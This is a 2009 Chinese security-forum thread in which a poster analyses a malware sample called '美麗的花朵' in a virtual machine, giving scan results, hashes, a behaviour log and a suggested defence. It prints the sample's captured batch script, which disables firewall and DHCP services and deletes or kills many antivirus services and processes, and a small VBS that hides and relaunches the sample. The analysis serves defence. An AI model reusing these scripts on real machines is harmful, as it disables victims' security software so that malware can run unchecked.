过主流样本—“美丽的花朵”—行为特征分析

显示全部楼层 · 发表于 2009-8-12 14:21:14

高质量样本—“美丽的花朵”—行为特征分析

病毒名：
BitDefender：DeepScan:Generic.Malware.SPDYBdQ!.3F2A43DF
卡巴斯基： PASS
瑞星： PASS

VirSCAN.org Scanned Report :
Scanned time : 2009/08/12 10:05:44 (CST)
Scanner results: 14%的杀软(5/37)报告发现病毒
（过主流杀软）
File Name    : 美麗的花朵.rar
File Size    : 39133 byte
File Type    : RAR archive data, v1d, os
MD5          : 283c7151eafa2bfa734029c577bf1424
SHA1          : de32f00a588da648bd4e84f3351bdc92d552f449
Online report  : http://virscan.org/report/33050f56bee7f5dc9a7da0b2bc365511.html

测试平台：深度SP3完美精简版 MD（HIPS）虚拟机

样本地址：http://bbs.kafan.cn/thread-537066-1-1.html

原文地址：http://www.pcslonline.com/post/43.html

小弟不才，第一次分析病毒样本，请高手指正

2009-8-12 12:59:11 创建新进程
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*

2009-8-12 12:59:33 创建文件
（创建名为bt3454.bat的批处理文件，多次运行发现后面的数字是随机组合的）
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: C:\Documents and Settings\Administrator\Local Settings\Temp\bt3454.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2009-8-12 13:00:08 创建新进程
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\wbem\wmiadap.exe
命令行: wmiadap.exe /F /T
规则: [应用程序]*

2009-8-12 13:00:49 设置文件隐藏属性（设置自身为隐藏）
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: C:\Documents and Settings\Administrator\Local Settings\Temp\bt3454.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2009-8-12 13:01:09 创建新进程
（调用cmd.exe来运行批处理文件）
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bt61632.bat "C:\Documents and Settings\Administrator\桌面\美麗的花朵\美麗的花朵.exe"
规则: [应用程序]*

2009-8-12 13:01:51 创建文件
（批处理文件中创建出一个名为jklo.vbs的脚本）
进程: c:\windows\system32\cmd.exe
目标: C:\Documents and Settings\Administrator\桌面\美麗的花朵\jklo.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2009-8-12 13:02:39 修改文件
进程: c:\windows\system32\cmd.exe
目标: C:\Documents and Settings\Administrator\桌面\美麗的花朵\jklo.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2009-8-12 13:03:43 创建新进程
（脚本开始运行，起作用了）
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\wscript.exe
命令行: "C:\WINDOWS\System32\WScript.exe" "C:\Documents and Settings\Administrator\桌面\美麗的花朵\jklo.vbs"
规则: [应用程序]*

2009-8-12 13:04:07 创建新进程
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\attrib.exe
命令行: attrib +h +r +s jklo.vbs
规则: [应用程序]*

2009-8-12 13:04:24 创建新进程
（重新运行病毒自身）

进程: c:\windows\system32\wscript.exe
目标: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
命令行: "C:\Documents and Settings\Administrator\桌面\美麗的花朵\美麗的花朵.exe"
规则: [应用程序]*

2009-8-12 13:05:06 设置文件隐藏属性
（设置jklo.vbs为隐藏属性）
进程: c:\windows\system32\attrib.exe
目标: C:\Documents and Settings\Administrator\桌面\美麗的花朵\jklo.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2009-8-12 13:06:12 创建文件
（又创建了一个批处理文件）
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: C:\Documents and Settings\Administrator\Local Settings\Temp\bt56225.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2009-8-12 13:07:45 创建新进程
（开始ping本机）
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\ping.exe
命令行: ping -n 1 127.1
规则: [应用程序]*

2009-8-12 13:08:15 设置文件隐藏属性
（设置批处理文件为隐藏）
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: C:\Documents and Settings\Administrator\Local Settings\Temp\bt56225.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2009-8-12 13:08:53 创建新进程
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\ping.exe
命令行: ping -n 1 127.1
规则: [应用程序]*

2009-8-12 13:09:15 创建新进程
进程: c:\documents and settings\administrator\桌面\美麗的花朵\美麗的花朵.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bt56225.bat "C:\Documents and Settings\Administrator\桌面\美麗的花朵\美麗的花朵.exe"
规则: [应用程序]*

2009-8-12 13:09:40 创建新进程
（接下来就是无止境的ping本机）
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\ping.exe
命令行: ping -n 1 127.1
规则: [应用程序]*

捕获到的 bt56225.bat （与bt3454一样）源码：

@shift
echo off
cls
pause
@echo off
if not exist jklo.vbs goto begin
net stop sharedaccess
net stop dhcp
sc config sharedaccess start=disabled
sc config dhcp start=disabled
sc config audiosrv start=disabled
sc delete navapsvc
sc delete wscsvc
sc delete KPfwSvc
sc delete SNDSrvc
sc delete ccProxy
sc delete ccEvtMgr
sc delete ccSetMgr
sc delete SPBBCSvc
sc delete Symantec Core LC
sc delete NPFMntor
sc delete MskService
sc delete FireSvc
tskill Mcshield & tskill VsTskMgr & tskill naPrdMgr & tskill UpdaterUI & tskill TBMon &

tskill scan32 & tskill Ravmond & tskill CCenter & tskill RavTask & tskill Rav & tskill

Ravmon & tskill RavmonD & tskill RavStub & taskill KVXP & tskill kvMonXP & tskill KVCenter

。。。。（由于发帖限制，中间省略N多）

捕获到的 jklo.vbs 源码：

Set WshShell = WScript.CreateObject("WScript.Shell")
Return = WshShell.Run("美麗的花朵.exe",0)

防御方法：使用hips软件阻止病毒释放出来的 bt xxx。bat 文件
使用hips软件阻止病毒释放出来的 vbs脚本文件

[ 本帖最后由 hu3167343 于 2009-8-12 17:48 编辑 ]

显示全部楼层 · 发表于 2009-8-12 14:52:22

高手来指导下呀

显示全部楼层 · 发表于 2009-8-12 14:58:32

这要啥指导的，你分析的不是很好么

显示全部楼层 · 发表于 2009-8-12 15:15:23

原帖由 IllusionWing 于 2009-8-12 14:58 发表
这要啥指导的，你分析的不是很好么

. 真的啊，能加入毒组吗？嘿嘿~~.

显示全部楼层 · 发表于 2009-8-12 15:16:35

[其他相关] 过主流样本—“美丽的花朵”—行为特征分析

评分

回复 2楼 hu3167343 的帖子

回复 4楼 hu3167343 的帖子

回复 5楼悠柚的帖子

回复 7楼 250662772 的帖子

回复 9楼 evilrabbit 的帖子

浏览过的版块